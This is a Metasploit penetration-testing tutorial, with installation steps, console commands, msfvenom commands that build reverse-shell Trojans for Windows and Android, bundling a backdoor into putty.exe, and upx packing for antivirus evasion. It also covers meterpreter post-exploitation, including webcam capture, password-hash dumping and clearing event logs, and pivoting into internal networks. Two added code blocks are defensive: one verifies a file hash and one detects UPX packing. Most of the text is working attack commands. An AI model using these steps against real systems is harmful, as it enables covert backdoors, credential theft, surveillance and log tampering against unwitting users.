0. Metasploit Overview
Metasploit is an open-source penetration testing framework. To date, msf ships thousands of modules covering publicly disclosed vulnerabilities together with supporting penetration testing tools. Modules are written in Ruby, so a user can modify a module as needed or even run test modules they wrote themselves. After selecting an attack module, only a few simple commands are needed to configure its parameters and run a test or exploit the vulnerability, which automates and simplifies the penetration testing process.
1. Metasploit Installation
Windows platform
First, download the installer from the official website:
http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe
Default port: 3650
Disable the anti-virus software and run the installer as administrator. The installation also sets up a PostgreSQL database that stores an index of every Metasploit module, which speeds up module loading and searching.
After installation a Metasploit shortcut is created on the desktop. Right-click it, run as Administrator to open a cmd window, and launch the Metasploit Console.
Metasploit takes a long time to load on Windows; if nothing seems to happen, wait 3-5 minutes.
On Windows, Metasploit also provides a web interface for graphical operation.
Linux platform
Obtain the source from GitHub:
git clone https://github.com/rapid7/metasploit-framework.git
Switch to the metasploit-framework directory, give msfconsole execute permission, and start it:
cd metasploit-framework && chmod +x msfconsole && ./msfconsole
Alternatively, use the following commands to download the installer script and install; how long it takes depends on the network:
cd /opt && curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall && ./msfinstall
Kali Linux ships with Metasploit and the Armitage automation front end.
Android platform
Installing Metasploit on Android actually means installing a Linux subsystem on Android first and then installing Metasploit on top of it. Although the process is complex and cumbersome, during a penetration test in an enterprise network environment carrying a laptop to access the network may be too conspicuous, so a phone or tablet with Metasploit installed can be a good option in that case.
Prerequisite: the Android phone or tablet needs root privileges.
Termux is usually chosen as the base environment. The system will start downloading components, and the time this takes depends on the network, so feel free to take a nap in the meantime =. =
Termux uses the apt package manager; run the following command to update:
apt-get update && apt-get upgrade -y && apt dist-upgrade -y
The subsequent Metasploit installation is the same as on the Linux platform.
2. Penetration Testing with Metasploit
Commonly used commands in the system terminal (outside msf)
msfdb init  initialize the msf database
apt install metasploit-framework  update msf
msfvenom  multi-platform attack payload generator
msf-nasm_shell  convert assembly instructions into the corresponding hexadecimal machine code
msfconsole  open the msf console
Commonly used commands inside the msf console
db_status  show the msf database connection status; connecting the database speeds up searching and other operations
db_rebuild_cache  rebuild the cache, re-storing the module index in the database
db_nmap  invoke an nmap scan and store the results in the database
help [db_connect]  show help for a command
search [module]  search for modules containing a keyword
use [module]  select a module to use (ms17_010, EternalBlue, is used as the example)
show payloads  list the payloads supported by the module
show options  show the parameters the module needs (those with Required set to no are optional)
info  if the show command's output is not complete enough, type info for full details
set [opt]  after selecting a module, set the value of a parameter the module needs (use unset to clear it)
setg [opt]  set a global parameter; parameters such as IP addresses can be set globally so they need not be set again after switching modules (use unsetg to clear)
back  return to the previous context
exploit/run  both commands run the attack module
sessions  list the currently connected sessions
3. Generating a Trojan File with msfvenom
On payload selection: for various reasons, such as a firewall, access from the outside to certain ports on the target host may be restricted, or only a few ports may be open with all others closed. In this case having the target host connect back to the attacker is the better option: the target initiates an outbound connection that looks like normal traffic, which can bypass such security settings, so a reverse payload is a popular choice.
Usually windows/meterpreter_reverse_tcp is used for 32-bit and windows/x64/meterpreter_reverse_tcp for 64-bit. Of course, the payload still needs to be chosen according to the specific need.
To list the available payloads, encoders, nops, or everything:
msfvenom -l [payloads|encoders|nops|all]
The Trojan file format is specified with -f (use -l formats to view the formats that can be generated):
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -a x64 -f exe -o backdoor_raw.exe
Generating an Android Trojan:
msfvenom -p android/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -o backdoor_raw.apk
Listening for the connect-back in the msf console:
use exploit/multi/handler  this module receives the connect-back session; usually only the listening host and port need to be set
4. Trojan Anti-Virus Evasion
Chaining multiple encoders for several rounds of encoding
Not recommended: the evasion rate is low, encoding takes a long time, and the resulting Trojan may fail to run, or run but fail to connect back to the attacker.
"-f raw" outputs the raw Trojan. In this pipeline the generated Trojan only needs to be passed on to the next stage, so the output format is specified only in the last command, and the commands before it should use the raw format.
Bundling into a normal file
Recommended: bundling the Trojan into a normal file makes users lower their guard. In real life, we should take care to compare the hash of a downloaded file against the official one.
Bundling targets should be chosen carefully; a bundled file may fail to run, in which case try an encoder or a different bundling target. putty is used as the example here.
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -x putty.exe -k -f exe -o backdoor_putty.exe
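The hash check the text recommends, as an added example that is not part of the original post: verify a downloaded file against a vendor-style SHA256SUMS file (the file name putty.exe, the file bytes and the checksum line are all constructed here; a real check uses the hash published by the vendor).

```python
import hashlib
import hmac
import tempfile
from pathlib import Path

# Constructed sample standing in for a downloaded installer (not real putty bytes).
SAMPLE_FILE_CONTENT = b"constructed stand-in for a downloaded installer\n"

def parse_sha256sums(text: str) -> dict:
    """Parse sha256sum output lines: '<hex>  <name>' or '<hex> *<name>' (binary mode)."""
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.strip().lstrip("*")
        if len(digest) != 64 or not all(c in "0123456789abcdefABCDEF" for c in digest):
            raise ValueError(f"malformed checksum line: {line!r}")
        sums[name] = digest.lower()
    return sums

def sha256_of_file(path, chunk_size: int = 1 << 20) -> str:
    """Hash in chunks so a large installer never has to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_download(path, sums_text: str) -> bool:
    """True only if the file's SHA-256 matches the published entry for its file name."""
    expected = parse_sha256sums(sums_text).get(Path(path).name)
    if expected is None:
        return False  # no published hash for this name: treat as unverified
    return hmac.compare_digest(sha256_of_file(path), expected)

def demo() -> tuple:
    """Write the constructed sample, then check a genuine copy and a modified one."""
    with tempfile.TemporaryDirectory() as tmp:
        genuine = Path(tmp) / "putty.exe"
        genuine.write_bytes(SAMPLE_FILE_CONTENT)
        published = hashlib.sha256(SAMPLE_FILE_CONTENT).hexdigest() + "  putty.exe\n"
        tampered = Path(tmp) / "tampered" / "putty.exe"  # same name, different bytes
        tampered.parent.mkdir()
        tampered.write_bytes(SAMPLE_FILE_CONTENT + b"extra bytes appended by a bundler")
        return verify_download(genuine, published), verify_download(tampered, published)
```

demo() returns (True, False): the genuine copy verifies, the copy with extra bytes does not, even though both carry the official file name.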
Packing
Recommended: packing can evade anti-virus detection to a certain extent. upx, which is commonly used on Linux, is used as the packing example here; on Windows there are many tools to choose from.
upx -5 backdoor_raw.elf  -5 is the compression level (1-9); see upx -h for details
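From the detection side, as an added example that is not part of the original post: a triage check that walks the PE headers of a Windows executable and flags the default section names upx leaves behind (UPX0, UPX1) or its UPX! magic. The two sample images are constructed header-only PE files, not real binaries, and the magic check does not depend on the file format.

```python
import struct

UPX_SECTION_PREFIX = b"UPX"   # upx names its sections UPX0, UPX1 (and sometimes UPX2)
UPX_MAGIC = b"UPX!"           # magic upx writes into its own packer header

def pe_section_names(data: bytes) -> list:
    """Follow DOS header -> PE signature -> COFF header and return the section names."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (opt_size,) = struct.unpack_from("<H", data, coff + 16)
    first = coff + 20 + opt_size            # section table follows the optional header
    names = []
    for i in range(num_sections):
        raw = data[first + 40 * i : first + 40 * i + 8]   # 40-byte entries, 8-byte name
        names.append(raw.split(b"\0", 1)[0])
    return names

def looks_upx_packed(data: bytes) -> bool:
    """Heuristic only: a binary whose sections were renamed after packing evades it."""
    if any(n.startswith(UPX_SECTION_PREFIX) for n in pe_section_names(data)):
        return True
    return UPX_MAGIC in data

def build_minimal_pe(section_names: list) -> bytes:
    """Constructed sample: a header-only PE32+ image with the given section names."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)   # e_lfanew: PE header right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0, 240, 0x22)
    optional = bytes(240)                   # zeroed PE32+ optional header
    table = b"".join(struct.pack("<8s32x", n) for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + optional + table

CLEAN_PE = build_minimal_pe([b".text", b".rdata", b".data"])
PACKED_PE = build_minimal_pe([b"UPX0", b"UPX1", b".rsrc"])
```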
Use the above methods in combination.
An online Trojan scanning site: http://www.virscan.org/
5. Post-Exploitation with meterpreter
Once the exploit/multi/handler listener has established a connection with the target host, post-exploitation can be carried out with meterpreter.
pwd  print the current working directory
sysinfo  show system information
ps  list the processes running on the target and their PIDs
webcam_snap  take a photo with the camera (webcam_stream emulates a video recorder in the browser for live monitoring)
run vnc  view the screen remotely over VNC (run screen_unlock enables remote control)
run post/windows/manage/enable_rdp  if the target is Windows, enable its Remote Desktop on port 3389
screenshot  capture the target's current screen
getuid  get the user ID of the current privilege level
getsystem  obtain SYSTEM privileges
hashdump  dump user names and password hashes
shell  get a shell on the target host (fix for garbled Chinese on Windows: chcp 65001)
Ctrl+Z  leave shell mode and return to meterpreter
upload  upload a file
download  download a file
execute  run a file on the target system (-f specifies the file, -i runs interactively, -H hides the window)
clearev  clear the event logs
background  put Meterpreter into the background (reconnect to the session with sessions -i)
6. Internal Network Penetration with Meterpreter Overview
During a penetration test, when access has been gained to an organization's host on the public network, that host may also be connected to an internal LAN whose other hosts have no access to the outside. This is a very common LAN layout, and the internal hosts that cannot reach the outside often store sensitive documents. The compromised host can now serve as a pivot for the attacker to reach the internal network and carry out internal network penetration.
Adding a route to reach the internal network
run get_local_subnets  list the subnets on the target host; here 192.168.16.0 is on the same segment as the attack machine and 169.254.0.0 is VirtualBox's internal network adapter mode
run autoroute -s 169.254.0.0/16 1  use the autoroute module to add a route to the internal network, forwarded via session 1
run autoroute -p  show the current routing table; traffic to the 169.254.0.0 segment will be forwarded through session 1
Next, db_nmap can be used in msf to scan for live hosts on the internal network and attack their open ports.
Port forwarding with portfwd
Port forwarding maps an internal network port to a port on the local host, similar to VirtualBox's port mapping feature.
portfwd -h  show help
portfwd add -l 7070 -r 192.168.16.59 -p 3389  forward port 3389 of target host 192.168.16.59 to local port 7070
rdesktop 127.0.0.1:7070  once the forward is in place, connect to RDP through the local port
References: "Metasploit: The Penetration Tester's Guide"; "Metasploit Penetration Testing Guide (Revised Edition)"